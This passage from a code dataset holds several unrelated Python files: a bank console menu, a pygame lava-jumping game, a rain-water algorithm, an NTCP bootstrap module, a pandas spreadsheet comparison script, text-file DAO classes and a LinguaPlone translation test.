Withdraw\")\n\t\t\tprint(\"3) Deposit\")\n\t\t\tprint(\"4) Transfer\") \n\t\t\tprint(\"5) List Accounts\")\n\t\t\tprint(\"6) Add Account\")\n\t\t\tprint(\"q) Quit\")\n\t\t\tprint(\"------------\")\n\t\t\tselection = input(\">>\").strip()\n\n\t\t\t# Inquire\n\t\t\tif selection == \"1\":\n\t\t\t\ttry: self.inquire(client)\n\t\t\t\texcept DNEError:\n\t\t\t\t\tprint(\"Invalid Selection\")\n\t\t\t\texcept NonAccError:\n\t\t\t\t\tprint(\"Invalid Selection\")\n\n\n\t\t\t# Withdraw\n\t\t\telif selection == \"2\":\n\t\t\t\ttry: self.withdraw(client)\n\t\t\t\texcept NoFundsSysError:\n\t\t\t\t\tprint(\"Insufficient Funds in System\")\n\t\t\t\texcept NoFundsError:\n\t\t\t\t\tprint(\"Insufficient Funds in Account\")\n\t\t\t\texcept NonAccError:\n\t\t\t\t\tprint(\"Nonexistent Account\")\n\n\t\t\t# Deposit\n\t\t\telif selection == \"3\":\n\t\t\t\ttry: self.deposit(client)\n\t\t\t\texcept ValueError:\n\t\t\t\t\tprint(\"Invalid Input. Resetting.\")\n\t\t\t\texcept NonAccError:\n\t\t\t\t\tprint(\"Nonexistent Account\")\n\n\n\t\t\t# Transfer\n\t\t\telif selection == \"4\":\n\t\t\t\ttry: self.transfer(client)\n\t\t\t\texcept ValueError:\n\t\t\t\t\tprint(\"Invalid Input. Resetting\")\n\t\t\t\texcept NoFundsError:\n\t\t\t\t\tprint(\"Insufficient Funds. Resetting.\")\n\t\t\t\texcept NonAccError:\n\t\t\t\t\tprint(\"Invalid Account Name. Resetting.\")\n\n\t\t\t# List Accounts\n\t\t\telif selection == \"5\":\n\t\t\t\tself.list(client)\n\n\t\t\t# Add Account\n\t\t\telif selection ==\"6\":\n\t\t\t\ttry: self.addAcc(client)\n\t\t\t\texcept AccDoubleJeopardyError:\n\t\t\t\t\tprint(\"Account already exists\")\n\n\n\t\t\telif selection == \"q\":\n\t\t\t\tbreak\n\n\t\t\telse:\n\t\t\t\tprint(\"Invalid Selection. Resetting.\")\n\n# Test run\nif __name__ == '__main__':\n\tsys = System(1000)\n\tct = ClientTable()\n\tct.add_client(\"JimmyJenk\", \"BillyBob\")\n\tct.add_client(\"Zack\", \"Yikes\")\n\tct.add_client(\"Jay\", \"Swag\")\n\tinterface = TESTInterface(ct, sys)\n\tinterface.run()","repo_name":"ZackFra/Bank_example","sub_path":"TESTInterface.py","file_name":"TESTInterface.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22626769505","text":"import os,sys\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n'''\nAbove two lines of code are a hack inorder to keep gamelib in a common\nlocation where I can update for all games. 
If you copy gamelib.py into\nthe same folder as the game then you don't need these lines and can simply\ndelete them.\n'''\n\nfrom gamelib import *\n\n###########################\ndef drawScore():\n x = game.width / 2\n for d in str(game.score):\n numbers[int(d)].moveTo(x,50)\n numbers[int(d)].draw()\n x += numbers[int(d)].width\n \n#####################\ndef intro():\n titleA = Image(\"images\\\\title1a.png\",game)\n titleA.y -= 110\n titleB = Image(\"images\\\\title1b.png\",game)\n titleB.y -=10\n\n platforms[0].y += 150\n hero.moveTo(platforms[0].x,platforms[0].y-platforms[0].height/2-hero.height/2 + 18)\n\n platforms[0].setSpeed(6,90)\n\n hsemblem.moveTo(game.width - hsemblem.width / 2 - 40, game.height - hsemblem.height / 2 - 40)\n infoemblem.moveTo(infoemblem.width / 2 + 40, game.height - infoemblem.height / 2 - 40)\n game.time = 1\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",2)\n titleA.draw()\n titleB.draw()\n hsemblem.draw()\n infoemblem.draw()\n \n if game.time <= 0:\n game.drawText(\"Press [SPACE] to Start\",game.width/2-175,game.height / 2 + 30,Font(black,32,red,'mael.ttf'))\n if keys.Pressed[K_SPACE]:\n game.over = True\n \n platforms[0].move(True)\n hero.moveTo(platforms[0].x,platforms[0].y-platforms[0].height/2-hero.height/2 + 20)\n c = red\n if pointer.collidedWith(hsemblem) and mouse.LeftButton:\n displayHighScore()\n elif pointer.collidedWith(hsemblem):\n c = yellow\n game.drawText(\"High Score\",game.width - hsemblem.width / 2 - 95, game.height - hsemblem.height / 2 + 10 ,Font(black,20,c,'mael.ttf'))\n \n c = red\n if pointer.collidedWith(infoemblem) and mouse.LeftButton:\n about()\n elif pointer.collidedWith(infoemblem):\n c = yellow\n game.drawText(\"About\",infoemblem.width / 2 + 15, game.height - infoemblem.height / 2 + 10 ,Font(black,20,c,'mael.ttf'))\n \n pointer.moveTo(mouse.x + pointer.width /2 - 10,mouse.y + pointer.height/2 - 10)\n game.update(30)\n \n game.over = False\n###########################\ndef newHighScore():\n nhstitle = Image(\"images\\\\newhighscore.png\",game)\n nhstitle.y = 50\n global last\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n\n game.drawText(\"Press [ESC] to Quit\",game.width/2-175,game.height * .75,Font(black,32,red,'mael.ttf'))\n \n nhstitle.draw()\n \n if keys.Pressed[K_ESCAPE]:\n game.over = True\n\n game.update(30)\n game.over = False\n###########################\ndef displayHighScore():\n hstitle = Image(\"images\\\\highscore.png\",game)\n hstitle.y = 50\n global last\n game.time = 2\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n hstitle.draw()\n\n if game.time <= 0:\n c = red\n if pointer.collidedWith(returnemblem) and mouse.LeftButton:\n game.over = True\n elif pointer.collidedWith(returnemblem):\n c = yellow\n game.drawText(\"Return\",game.width /2 - returnemblem.width / 2 + 15, game.height - returnemblem.height / 2 + 10 ,Font(black,20,c,'mael.ttf'))\n returnemblem.draw()\n \n pointer.moveTo(mouse.x + pointer.width /2 - 10,mouse.y + pointer.height/2 - 10)\n \n if keys.Pressed[K_ESCAPE]:\n game.over = True\n\n game.update(30)\n game.over = False\n###########################\ndef about():\n abouttitle = Image(\"images\\\\about.png\",game)\n abouttitle.y = 50\n global last\n game.time = 1\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n\n abouttitle.draw()\n \n if game.time <= 0:\n c = red\n if pointer.collidedWith(returnemblem) and mouse.LeftButton:\n game.over = True\n elif 
pointer.collidedWith(returnemblem):\n c = yellow\n game.drawText(\"Return\",game.width / 2 - returnemblem.width / 2 + 15, game.height - returnemblem.height / 2 + 10 ,Font(black,20,c,'mael.ttf'))\n returnemblem.draw()\n \n pointer.moveTo(mouse.x + pointer.width /2 - 10,mouse.y + pointer.height/2 - 10)\n textFont = Font(black,24,red,'mael.ttf')\n game.drawText(\"Help Glitch escape the volcano by jumping across\",100,120,textFont)\n game.drawText(\"the floating platforms to the teleportation rune.\",100,160,textFont)\n game.drawText(\"Be wary of the various perils that challenge your escape.\",100,200,textFont)\n game.drawText(\"Use the arrow keys to move and the spacebar to jump\",100,240,textFont)\n\n if keys.Pressed[K_ESCAPE]:\n game.over = True\n\n game.update(30)\n game.over = False\n###########################\ndef levelOne():\n jumping = False\n factor = 1\n landed = False\n currentrocklanded = -1\n challengeSpeed = 2\n global last\n fire.moveTo(randint(fire.width,game.width-fire.width),-fire.height)\n fire.speed = randint(4,8)\n \n dragon.moveTo(game.width + dragon.width / 2 + 20,randint(dragon.width/2,game.height-dragon.height/2))\n dragon.setSpeed(4,90)\n\n game.playMusic()\n\n #Start Game\n while not game.over:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n drawScore()\n \n for obj in world:\n obj.x -= challengeSpeed\n \n onrock = False\n for index, platform in enumerate(platforms):\n platform.draw()\n #Recycle platforms\n if platform.isOffScreen(\"left\"):\n platform.moveTo(platforms[last].x + platforms[last].width + 100,randint(200,300))\n last = index\n #Check if hero is on a rock\n if hero.collidedWith(platform,\"rectangle\") and hero.bottom < platform.top + 15 and hero.x > platform.left and hero.x < platform.right: \n onrock = True\n if not landed and currentrocklanded != index:\n game.score += 1\n landed = True\n landing.play()\n currentrocklanded = index\n \n #Jumping Logic\n if jumping:\n hero.y -= 18 * factor\n factor *= .95\n landed = False\n if factor < .18:\n jumping = False\n factor = 1\n if keys.Pressed[K_SPACE] and onrock and not jumping:\n jumping = True\n jumpingSound.play()\n \n if not onrock:\n hero.y += 5\n \n #Prevent hero going off left side of the screen\n if hero.left <= game.left:\n hero.x = hero.width / 2\n \n if keys.Pressed[K_RIGHT]:\n hero.x += 4 + challengeSpeed\n hero.nextFrame()\n if onrock :#and hero.f in [1,2,8,9]:\n walking.play(250)\n elif keys.Pressed[K_LEFT]:\n hero.x -= 4\n hero.prevFrame()\n if onrock :#and hero.f in [1,2,8,9]:\n walking.play(250)\n else:\n hero.draw()\n\n #Fire and dragon logic\n if game.score >= 10 and game.score < 15: \n fire.y += fire.speed\n fire.draw(False)\n fireSound.play()\n if fire.isOffScreen(\"bottom\") or not fire.visible:\n fire.moveTo(randint(50,game.width-50),-fire.height)\n fire.speed = randint(4,10)\n fire.visible = True\n if hero.collidedWith(fire):\n game.over = True\n if (game.score >= 4 and game.score < 9) or not dragon.isOffScreen():\n dragon.move(False)\n dragonSound.play()\n if dragon.isOffScreen(\"left\"):\n dragon.moveTo(game.width + dragon.width / 2 + 20,randint(dragon.width/2,game.height-dragon.height/2))\n if dragon.collidedWith(hero):\n hero.x -= 6\n\n if hero.isOffScreen(\"bottom\"):\n game.over = True\n splash.play()\n \n game.update(30)\n\n#####################\ndef gameover():\n endtitle = Image(\"images\\\\tgameover.png\",game)\n \n global last\n while True:\n game.processInput()\n\n game.scrollBackground(\"left\",1)\n for obj in world:\n obj.x -= 2\n\n for index, platform in 
enumerate(platforms):\n platform.draw()\n #Recycle platforms\n if platform.isOffScreen(\"left\"):\n platform.moveTo(platforms[last].x + platforms[last].width + 150,randint(200,300))\n last = index\n \n game.drawText(\"Play Again? [Y/N]\",game.width/2-175,game.height * .75,Font(black,32,red,'mael.ttf'))\n \n endtitle.draw()\n \n if keys.Pressed[K_y]:\n game.over = False\n return True\n if keys.Pressed[K_n]:\n return False\n\n game.update(30)\n \n#####################\ngame = Game(1008,440,\"Glitch - The Lava Jumper\")\n\nplatforms = []\nsize = 10\nlast = size -1\n\n#Load objects\nbk = Image(\"images\\\\lavabk2.jpg\",game)\nbk.resizeTo(game.width, game.height)\ngame.setBackground(bk)\n\nhsemblem = Image(\"images\\\\highscoreemblem.png\",game)\nhsemblem.resizeBy(-60)\ninfoemblem = Image(\"images\\\\infoemblem.png\",game)\ninfoemblem.resizeBy(-60)\nreturnemblem = Image(\"images\\\\return3.png\",game)\nreturnemblem.resizeBy(-60)\nreturnemblem.y = game.height - returnemblem.height / 2 - 40\n\npointer = Image(\"images\\\\pointer1.png\",game)\npointer.resizeBy(-80)\nmouse.visible = False\n\nfor times in range(size):\n f = randint(1,3)\n platforms.append(Image(\"images\\\\platform\" + str(f) + \".png\",game))\n\nhero = Animation(\"images\\\\glitch_walker.png\",16,game,832/8,228/2)\nhero.stop()\n\nnumbers = []\nfor n in range(10):\n numbers.append(Image(\"images\\\\t\" + str(n) + \".png\",game))\n\nfire = Animation(\"images\\\\fire.png\",20,game,960/5,768/4,3)\ndragon = Animation(\"images\\\\dragon.png\",11,game,768/3,1024/4,4)\n\ngame.setMusic(\"sounds\\\\avalanche.mp3\")\ndragonSound = Sound(\"sounds\\\\dragonBreathe.wav\",1)\nfireSound = Sound(\"sounds\\\\fireball.wav\",2)\njumpingSound = Sound(\"sounds\\\\jumping.wav\",3)\nlanding = Sound(\"sounds\\\\landing.wav\",4)\nwalking = Sound(\"sounds\\\\walking.wav\",5)\nsplash = Sound(\"sounds\\\\splash.wav\",6)\n\n#Play Intro\nintro()\n\n#Position objects\nplatforms[0].moveTo(game.width/2,randint(250,300))\nfor index in range(1,size):\n platforms[index].moveTo(platforms[index-1].x + platforms[index-1].width + 100,randint(250,350))\n\nhero.moveTo(platforms[0].x,platforms[0].y-platforms[0].height/2-hero.height)\n\nworld = [hero]\nworld.extend(platforms)\n\nplay = True\nwhile play:\n #Play Game\n levelOne()\n play = gameover()\n platforms[0].moveTo(game.width/2,randint(250,300))\n for index in range(1,size):\n platforms[index].moveTo(platforms[index-1].x + platforms[index-1].width + 100,randint(250,350))\n\n hero.moveTo(platforms[0].x,platforms[0].y-platforms[0].height/2-hero.height)\n\n world = [hero]\n world.extend(platforms)\n game.score = 0\n last = size -1\n\ngame.quit()\n\n\n\n\n","repo_name":"rcastro2/pygameAbstract","sub_path":"LavaJumper/LavaJumper.py","file_name":"LavaJumper.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"16814093682","text":"from typing import List\n\n\nclass Solution:\n def trap(self, height: List[int]) -> int:\n print(height)\n\n if height is None or len(height) == 0:\n return 0\n\n totalTrapped = 0\n leftHigh = [0] * len(height)\n rightHigh = [0] * len(height)\n leftHigh[0] = height[0]\n rightHigh[-1] = height[-1]\n\n for i in range(1, len(height)):\n leftHigh[i] = max(leftHigh[i-1], height[i])\n\n for i in range(len(height)-2, -1, -1):\n rightHigh[i] = max(rightHigh[i+1], height[i])\n\n for i in range(len(height)):\n totalTrapped += min(leftHigh[i], rightHigh[i]) - height[i]\n\n return totalTrapped\n\n\nif __name__ 
== \"__main__\":\n s = Solution()\n print(s.trap([0,1,0,2,1,0,1,3,2,1,2,1]))\n","repo_name":"vishwakt/A-Problem-A-Day","sub_path":"42_trapping_rain_water.py","file_name":"42_trapping_rain_water.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17562459842","text":"import random\r\nimport time\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import *\r\nfrom tkinter import *\r\nfrom ..Patients import *\r\n\r\n\r\ndef calculateLKBuncert(self):\r\n \"\"\"Based on http://stacks.iop.org/1742-6596/489/i=1/a=012087?key=crossref.181b59106e0d253de74e704220e16c36.\r\n\r\n Choose between profile likelihood method, parametric and non-parametric bootstrapping (time demanding!!!!!)\r\n Profile likelihood method: Vary each parameter individually until the LLH is decreased by an amount equal to half the\r\n the critical value of chi2(1) distribution at the desired significance level\r\n Critical value: http://www3.med.unipmn.it/~magnani/pdf/Tavole_chi-quadrato.pdf. 1.92?\r\n\r\n Non-parametric: Randomly choose patients, with replacement, from sample 1000-2000 times and calculate n,m,TD50 from sample\r\n The confidence interval is chosen from the distribution of n,m,TD50 values\r\n Assumptions: The cohort covers the different parameters, a robust method.\r\n My assumption: We choose the same number of patients.\r\n\r\n Parametric bootstrapping: A synthesised population is derived from the found n,m,TD50\r\n For each patient, calculate the NTCP using the optimized n,m,TD50 values.\r\n Generate a random number rn [0,1] for each patient; rn < NTCP -> tox, rn > NTCP -> no tox\r\n Find n,m,TD50 from the synthesized population using these values, repeat 1000-2000 times\r\n Assumption: The cohort describes the real population. 
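\r\n\r\n    A compressed sketch of that parametric loop (names are illustrative only;\r\n    ntcp(p) stands for the fitted model and fit() for the optimizer):\r\n\r\n        samples = []\r\n        for _ in range(iterations):\r\n            for p in patients:\r\n                p.tox = random.random() < ntcp(p)   # synthesize outcomes\r\n            samples.append(fit(patients))           # re-fit n, m, TD50\r\n    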
\"\"\"\r\n\r\n # REDO THIS\r\n\r\n self.window.destroy() # Destroy bootstrap dialog window\r\n\r\n cohortList = list(self.patients.values())\r\n cohortNames = \", \".join(list(self.patients.keys()))\r\n nIterations = self.options.confidenceIntervalIterations.get()\r\n\r\n for patients in cohortList:\r\n patients.options = self.options\r\n patients.pSpace = patients.ParameterSpace(nIterations, self.options.NTCPcalculation.get(), self.log, patients.cohort)\r\n\r\n if self.options.NTCPcalculation.get() == \"Logit\":\r\n patients.calculateDpercent(self.options.NTCPcalculationDpercent.get())\r\n if np.sum(patients.bestParameters):\r\n patients.pSpace.setParameters({'a': patients.bestParameters[0], 'b': patients.bestParameters[1]})\r\n\r\n else:\r\n if np.sum(patients.bestParameters):\r\n patients.pSpace.setParameters({'n': patients.bestParameters[0], 'm': patients.bestParameters[1], 'TD50': patients.bestParameters[2]})\r\n\r\n if self.options.optimizationScheme.get() == \"GradientDescent\":\r\n res = patients.doGradientOptimization(self.progress)\r\n\r\n elif self.options.optimizationScheme.get() == \"MatrixMinimization\":\r\n res = patients.doMatrixMinimization(self.progress)\r\n\r\n patients.calculateNTCP()\r\n patients.bestParameters = res.x\r\n\r\n origIt = self.options.basinHoppingIterations.get()\r\n self.options.basinHoppingIterations.set(2)\r\n self.progress['maximum'] = nIterations * len(cohortList)\r\n\r\n grade = self.options.toxLimit.get()\r\n\r\n # Loop over cohorts early\r\n for cohort, patients in self.patients.items():\r\n print(f\"Looping over cohort {cohort} of {cohortNames}\")\r\n time1 = time.time()\r\n\r\n if self.options.confidenceIntervalMethod.get() == \"ParametricBootstrapping\":\r\n patients.saveTox()\r\n\r\n for k in range(nIterations):\r\n self.progress.step(1)\r\n self.progress.update_idletasks()\r\n\r\n for patient in patients.patients.values():\r\n rn = random.random()\r\n ntcp = patient.getNTCP()\r\n patient.setTox(rn < ntcp and grade or 0)\r\n\r\n if self.options.optimizationScheme.get() == \"GradientDescent\":\r\n res = patients.doGradientOptimization(None)\r\n elif self.options.optimizationScheme.get() == \"MatrixMinimization\":\r\n res = patients.doMatrixMinimization(None)\r\n\r\n if res.fun < -self.options.confidenceIntervalLikelihoodLimit.get():\r\n continue\r\n\r\n patients.pSpace.addPoint(*res.x)\r\n patients.pSpace.addPointLLH(-res.fun)\r\n\r\n patients.restoreTox()\r\n\r\n elif self.options.confidenceIntervalMethod.get() == \"NonParametricBootstrapping\":\r\n patientZip = list()\r\n for patientName in patients.patients.keys():\r\n patientZip.append((cohort, patientName))\r\n nPatients = len(patientZip)\r\n\r\n for k in range(nIterations):\r\n print(\".\", end=\"\")\r\n self.progress.step(1)\r\n self.progress.update_idletasks()\r\n\r\n newPatientCohort = Patients(self.options)\r\n newPatientCohort.bestParameters = list(patients.bestParameters)\r\n\r\n nTox = 0\r\n for n in range(nPatients):\r\n thisPatient = Patient(None)\r\n randomPatientID = random.randint(0, nPatients - 1)\r\n\r\n thisCohort = patientZip[randomPatientID][0]\r\n thisName = patientZip[randomPatientID][1]\r\n thisPatient.setTox(self.patients[thisCohort].patients[thisName].getTox())\r\n nTox += thisPatient.getTox() >= self.options.toxLimit.get()\r\n if self.options.NTCPcalculation.get() == \"LKB\":\r\n thisPatient.nList = self.patients[thisCohort].patients[thisName].nList\r\n thisPatient.GEUDlist = self.patients[thisCohort].patients[thisName].GEUDlist\r\n else:\r\n thisPatient.Dpercent = 
self.patients[thisCohort].patients[thisName].Dpercent\r\n                    thisPatient.setID(thisName)\r\n                    while thisName in newPatientCohort.patients:\r\n                        thisName += \"_\"\r\n                    newPatientCohort.patients[thisName] = thisPatient\r\n\r\n                if nTox == 0:\r\n                    continue\r\n\r\n                if self.options.optimizationScheme.get() == \"GradientDescent\":\r\n                    res = newPatientCohort.doGradientOptimization(None)\r\n                elif self.options.optimizationScheme.get() == \"MatrixMinimization\":\r\n                    res = newPatientCohort.doMatrixMinimization(None)\r\n\r\n                del newPatientCohort\r\n\r\n                if res.fun < -self.options.confidenceIntervalLikelihoodLimit.get():\r\n                    continue\r\n\r\n                patients.pSpace.addPoint(*res.x)\r\n                patients.pSpace.addPointLLH(-res.fun)\r\n\r\n        elif self.options.confidenceIntervalMethod.get() == \"ProfileLikelihood\":\r\n            res = patients.profileLikelihood()\r\n            if self.options.NTCPcalculation.get() == \"Logit\":\r\n                patients.pSpace.CI[\"a\"] = res[0]\r\n                patients.pSpace.CI[\"b\"] = res[1]\r\n            else:\r\n                patients.pSpace.CI[\"n\"] = res[0]\r\n                patients.pSpace.CI[\"m\"] = res[1]\r\n                patients.pSpace.CI[\"TD50\"] = res[2]\r\n\r\n            patients.pSpace.printCI()\r\n\r\n            patients.confidenceInterval = res\r\n            return\r\n\r\n        print(\"Done\\n\\n\")\r\n\r\n        time2 = time.time()\r\n        self.options.basinHoppingIterations.set(origIt)\r\n\r\n        ###################################################################\r\n        # Finished performing the bootstrap, analyse the results ... :)  #\r\n        ###################################################################\r\n\r\n        patients.pSpace.trim()\r\n\r\n        patients.pSpace.setPercentile(self.options.confidenceIntervalPercent.get())\r\n        patients.pSpace.setBootstrapCorrectionMethod(self.options.bootstrapCorrectionMethod.get())\r\n        patients.pSpace.calculateCI()\r\n        patients.pSpace.applyPivot()\r\n        patients.pSpace.writeToFile()\r\n\r\n        self.log(f\"\\nFinished Confidence Interval tests for cohort {cohort} ({(time2-time1)/60:.1f} minutes).\")\r\n        self.log(f\"{self.options.confidenceIntervalPercent.get()}% CI calculated as \"\r\n                 f\"the percentiles of a {self.options.confidenceIntervalMethod.get()} procedure.\")\r\n\r\n        patients.pSpace.printResults(self.log)\r\n        patients.bestParameters = patients.pSpace.getParameters()\r\n        patients.pSpace.plotResults()\r\n\r\n    plt.show()\r\n","repo_name":"lc52520/DVHToolkit","sub_path":"modules/MainMenu/_NTCPbootstrap.py","file_name":"_NTCPbootstrap.py","file_ext":"py","file_size_in_byte":8366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"28605646898","text":"import pandas as pd\n\n\ndef primeira_planilha():\n\n    dados = dict()\n    # Open the spreadsheet and read the data\n    df_planilha = pd.read_excel('planilhas/PLANILHA CORREIOS ATUALIZADO 17 04 23 A 16 05 23.xlsx')\n\n    valores_coluna_5 = df_planilha.iloc[:, 5].fillna('-').tolist()[1:]\n    valores_coluna_7 = df_planilha.iloc[:, 7].fillna('-').tolist()[1:]\n\n    # Print the column values\n    for valor5, valor7 in zip(valores_coluna_5[1:], valores_coluna_7[1:]):\n        print(valor5, valor7)\n        dados[valor5] = valor7\n    \n    return dados\n\n\ndef segunda_planilha():\n    dados = dict()\n    # Open the spreadsheet and read the data\n    df_csv = pd.read_csv('planilhas/correiostec.csv', sep=';')\n    num_colunas = df_csv.shape\n    print(\"TEC number of columns:\", num_colunas)\n\n    valores_coluna_1 = df_csv.iloc[:, 1].fillna('-').tolist()[0:]\n    valores_coluna_2 = df_csv.iloc[:, 2].fillna('-').tolist()[0:]\n\n    for valor1, valor2 in zip(valores_coluna_1, valores_coluna_2):\n        print(valor1, valor2)\n        dados[valor1] = valor2\n    \n    return 
dados\n\n\ndef terceira_planilha():\n    dados = dict()\n    # Open the spreadsheet and read the data\n    df_csv = pd.read_csv('planilhas/correiosdistri.csv', sep=';')\n    num_colunas = df_csv.shape\n    print(\"DISTRI Número de colunas:\", num_colunas)\n\n    valores_coluna_1 = df_csv.iloc[:, 1].fillna('-').tolist()[0:]\n    valores_coluna_2 = df_csv.iloc[:, 2].fillna('-').tolist()[0:]\n\n    for valor1, valor2 in zip(valores_coluna_1, valores_coluna_2):\n        print(valor1, valor2)\n        dados[valor1] = valor2\n    \n    return dados\n\n\ndef comparar_dicionarios(dic1, dic2):\n    for chave in dic1:\n        if chave in dic2:\n            if dic1[chave] > 0:\n                print(\"Nota Fiscal:\", chave)\n                print(\"Valor na planilha um:\", dic1[chave])\n                print(\"Valor no planilha dois:\", dic2[chave])\n                print() \n\n\nif __name__ == '__main__':\n    planilha_um = primeira_planilha()\n    planilha_dois = segunda_planilha()\n    planilha_tres = terceira_planilha()\n\n    comparar_dicionarios(planilha_um, planilha_dois)\n    comparar_dicionarios(planilha_um, planilha_tres)","repo_name":"cesnascimento/FreteB2B","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24586843297","text":"#File for storing, updating or removing data in the persistent files\n\n#import everything from the models module\nfrom models import *\n\nclass DaoCategoria:\n    \n    @classmethod\n    def salvar(cls, categoria):\n        with open('Categoria.txt', 'a') as arq:\n            arq.writelines(categoria)\n            arq.writelines('\\n')\n    \n    @classmethod\n    def ler(cls):\n        with open('Categoria.txt', 'r') as arq:\n            cls.categoria = arq.readlines()\n        \n        #To strip the \\n, just apply a replace to each item in the list, changing it to an empty string\n        cls.categoria = list(map(lambda x: x.replace('\\n',''), cls.categoria))\n        \n        listaCat = []\n        for i in cls.categoria:\n            listaCat.append(Categoria(i))\n        \n        #Returns a list of object instances\n        return listaCat\n\nclass DaoVendas:\n    \n    @classmethod\n    def salvar(cls, venda: Venda):\n        with open('Vendas.txt', 'a') as arq:\n            arq.writelines(venda.itensVendido.nome+'|'+str(venda.itensVendido.valor)+'|'\n                           +venda.itensVendido.categoria+'|'+venda.vendedor+'|'\n                           +venda.comprador+'|'+str(venda.quantidadeVendida)+'|'\n                           +venda.data)\n            arq.writelines('\\n')\n\n    @classmethod\n    def ler(cls):\n        with open('Vendas.txt', 'r') as arq:\n            cls.venda = arq.readlines()\n\n        cls.venda = list(map(lambda x: x.replace('\\n',''), cls.venda))\n        cls.venda = list(map(lambda x: x.split('|'), cls.venda))\n\n        listaVend = []\n        for i in cls.venda:\n            listaVend.append(Venda(Produtos(i[0], i[1], i[2]), i[3], i[4], i[5], i[6]))\n        \n        #Returns a list of object instances\n        return listaVend\n\nclass DaoEstoque:\n\n    @classmethod\n    def salvar(cls, produto: Produtos, quantidade):\n        with open('Estoque.txt', 'a') as arq:\n            arq.writelines(produto.nome+'|'+str(produto.valor)+'|'\n                           +produto.categoria+'|'+str(quantidade))\n            arq.writelines('\\n')\n    \n    @classmethod\n    def ler(cls):\n        with open('Estoque.txt', 'r') as arq:\n            cls.estoque = arq.readlines()\n        \n        cls.estoque = list(map(lambda x: x.replace('\\n',''), cls.estoque))\n        cls.estoque = list(map(lambda x: x.split('|'), cls.estoque))\n        \n        listaEst = []\n        for i in cls.estoque:\n            listaEst.append(Estoque(Produtos(i[0], i[1], i[2]), int(i[3])))\n        \n        #Returns a list of object instances\n        return listaEst\n\nclass DaoFornecedor:\n\n    @classmethod\n    def salvar(cls, fornecedor: Fornecedor):\n        with open('Fornecedor.txt', 'a') as arq:\n            
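#Persist the supplier as a single pipe-delimited line; ler() below splits these records back on '|'\n            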
arq.writelines(fornecedor.nome+'|'+fornecedor.cnpj+'|'\n +fornecedor.telefone+'|'+fornecedor.categoria+'|')\n arq.writelines('\\n')\n\n @classmethod\n def ler(cls):\n with open('Fornecedor.txt', 'r') as arq:\n cls.fornecedor = arq.readlines()\n\n cls.fornecedor = list(map(lambda x: x.replace('\\n',''), cls.fornecedor))\n cls.fornecedor = list(map(lambda x: x.split('|'), cls.fornecedor))\n \n listaFor = []\n for i in cls.fornecedor:\n listaFor.append(Fornecedor(i[0], i[1], i[2], i[3]))\n\n return listaFor\n\nclass DaoCliente:\n\n @classmethod\n def salvar(cls, cliente: Cliente):\n with open('Cliente.txt', 'a') as arq:\n arq.writelines(cliente.nome+'|'+cliente.telefone+'|'\n +cliente.cpf+'|'+cliente.email+'|'\n +cliente.endereco)\n arq.writelines('\\n')\n\n @classmethod\n def ler(cls):\n with open('Cliente.txt', 'r') as arq:\n cls.cliente = arq.readlines()\n\n cls.cliente = list(map(lambda x: x.replace('\\n',''), cls.cliente))\n cls.cliente = list(map(lambda x: x.split('|'), cls.cliente))\n\n listaCli = []\n for i in cls.cliente:\n listaCli.append(Cliente(i[0], i[1], i[2], i[3], i[4]))\n\n return listaCli\n\nclass DaoFuncionario:\n\n @classmethod\n def salvar(cls, funcionario: Funcionario):\n with open('Funcionario.txt', 'a') as arq:\n arq.writelines(funcionario.clt+'|'+funcionario.nome+'|'\n +funcionario.telefone+'|'+funcionario.cpf+'|'\n +funcionario.email+'|'+funcionario.endereco)\n arq.writelines('\\n')\n \n @classmethod\n def ler(cls):\n with open('Funcionario.txt', 'r') as arq:\n cls.funcionario = arq.readlines()\n\n cls.funcionario = list(map(lambda x: x.replace('\\n', ''), cls.funcionario))\n cls.funcionario = list(map(lambda x: x.split('|'), cls.funcionario))\n\n listaFunc = []\n for i in cls.funcionario:\n listaFunc.append(Funcionario(i[0], i[1], i[2], i[3], i[4], i[5]))\n\n return listaFunc\n","repo_name":"FernandohsSantos1/MVC_Mercearia","sub_path":"DAO.py","file_name":"DAO.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30986530930","text":"\"\"\"\n$Id:\n\"\"\"\n# Test weblog with LP >= 0.9\n\nfrom Products.LinguaPlone.tests.utils import makeContent\nfrom Products.LinguaPlone.tests.utils import makeTranslation\n\nfrom Products.Quills.tests import QuillsLinguaPloneTestCase\nimport transaction\n\nclass TestWeblogTranslation(\n QuillsLinguaPloneTestCase.QuillsLinguaPloneTestCase):\n\n def _setup(self):\n QuillsLinguaPloneTestCase.QuillsLinguaPloneTestCase._setup(self)\n\n def afterSetUp(self):\n self.login()\n self.setRoles([\"Manager\"])\n self.addLanguage('de')\n self.setLanguage('en')\n self.weblog_en = makeContent(self.folder, 'Weblog', 'weblog')\n self.weblog_en.setLanguage('en')\n\n def testTranslationKeepSameIdInDifferentFolders(self):\n self.weblog_de = makeTranslation(self.weblog_en, 'de')\n englishpost = makeContent(self.weblog_en, 'WeblogEntry', 'post')\n englishpost.setLanguage('en')\n germanpost = makeTranslation(englishpost, 'de')\n self.assertEqual(englishpost.getId(), germanpost.getId())\n\n def testTranslationIsMovedToTranslatedFolder(self):\n self.weblog_de = makeTranslation(self.weblog_en, 'de')\n englishpost = makeContent(self.weblog_en, 'WeblogEntry', 'post')\n englishpost.setLanguage('en')\n germanpost = makeTranslation(englishpost, 'de')\n self.failUnless(englishpost in self.weblog_en.objectValues())\n self.failUnless(germanpost in 